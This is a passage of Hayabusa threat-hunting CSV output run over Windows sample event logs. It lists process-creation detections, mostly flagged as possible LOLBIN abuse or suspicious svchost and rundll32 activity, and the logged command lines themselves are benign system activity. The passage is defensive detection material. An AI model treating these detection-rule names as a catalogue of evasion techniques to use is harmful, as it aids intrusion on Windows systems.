Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:27.649 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:47.904 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:48.029 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:49.005 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:24.078 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:24.155 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:50.397 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:50.481 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:53.494 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:45:17.009 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: 
C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:45:17.120 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:45:55.086 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:45:55.181 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:46:29.971 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:46:30.076 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 
8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:47:06.223 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:47:06.332 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:47:41.359 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:47:42.736 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:48:23.665 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:48:23.826 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:48:46.838 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:48:47.001 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:49:56.148 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:49:56.315 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:49:59.727 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:03.843 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:03.998 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:11.414 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:11.583 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:23.151 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:23.337 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:37.272 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:51:37.462 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:52:34.610 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:52:34.820 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:53:22.275 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:53:22.491 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:53:23.408 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 15:07:41.210 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 15:52:11.006 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 16:11:14.220 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:19:15.534 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:19:44.532 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:19:44.676 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan 
-Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:19:44.692 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:21:44.528 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:21:44.528 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:27:33.432 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:34:52.733 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:34:54.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 21:35:14.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 21:35:14.187 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.187 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.296 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.296 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.343 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.343 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.453 
+00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.453 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.500 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.578 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.796 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:14.796 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.171 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.171 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.773 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.945 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.945 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.976 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:15.976 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:16.101 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 
